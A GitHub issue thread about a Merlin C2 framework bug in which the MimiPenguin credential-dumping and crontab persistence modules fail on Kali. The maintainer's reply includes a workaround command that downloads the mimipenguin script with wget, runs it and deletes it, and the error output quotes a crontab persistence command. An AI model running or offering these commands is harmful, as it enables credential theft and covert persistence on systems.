merlin icon indicating copy to clipboard operation
merlin copied to clipboard
verified publisher icon Ne0nd0g

MimiPenguin & BASH Path Error

Open P-T001 opened this issue 4 years ago • 4 comments

Hi There, I looked for several post-c2 development frameworks. Finally, I thought Merlin was better and easy to install, but now I have a problem. I casually tested several modules and each time it was "not found" and "exit status code 127". But I can use the echoed command directly

error: [-] Results job lkqFILVvZK for agent f8eb12ec-3fef-4f17-8763-c230x7a791aa at 2021-08-09T08:51:18Z

[+] /bin/sh: 1: (crontab -l 2>/dev/null; echo "* * * * * /bin/bash -c") | crontab - && echo crontab successfully modified.: not found

[!] exit status 127

Prerequisite

  • [x] I have read the README
  • [x] I have search the opened & closed issues
  • [x] I have search the WIKI and its FAQ page

Environment Data

  • Merlin Version:
  • Merlin Build:
  • Go Version:go1.15.9 linux/amd64
  • GOPATH Environment Variable:
  • GOROOT Environment Variable:
  • Operating System: kali-linux-2020.2-amd64

P-T001 avatar Aug 09 '21 10:08 P-T001

Can you please share the following information:

  • A list of module names that were not found
  • A list of module names that returned an error
  • The Merlin Server version and build
  • The Merlin Agent version, build, and operating system

Ne0nd0g avatar Aug 09 '21 10:08 Ne0nd0g

以下信息:

  • A list of module names that were not found: I don't understand what you mean
  • A list of module names that returned an error:(I tested that both modules reported the above 127 errors) linux/x64/bash/credentials/MimiPenguin linux/x64/bash/persistence/CrontabPersistence
  • The Merlin Server version and build: Version: 1.1.0 system:kali-linux-2020.2-amd64 、go1.15.9 linux/amd64 *The Merlin Agent version, build, and operating system: Version: 1.0.2 system:kali-linux-2020.2-amd64 、go1.15.9 linux/amd64

P-T001 avatar Aug 10 '21 01:08 P-T001

You said:

I casually tested several modules and each time it was "not found"

What modules did you test that were "not found"?

The problem is that the module is for BASH but Kali uses Debian Almquist shell (dash). The symbolic link for /bin/sh on Kali points to /usr/bin/dash. The modules are causing an error because they are using /bin/bash which does not exist on Kali.

A temporary work around is to replace the commands list with:

    "commands": [
      "/bin/sh", "-c", "wget -O /tmp/mimipenguin.sh https://raw.githubusercontent.com/huntergregal/mimipenguin/beta-1.0/mimipenguin.sh;bash /tmp/mimipenguin.sh && rm /tmp/mimipenguin.sh"
    ]

I will work on fixing the code.

Ne0nd0g avatar Aug 10 '21 12:08 Ne0nd0g

"Not found" refers to the error message in error code 127. It is not that the module cannot be found. I think it should be the problem you said: use "/bin/bash" that does not exist on Kali

P-T001 avatar Aug 11 '21 01:08 P-T001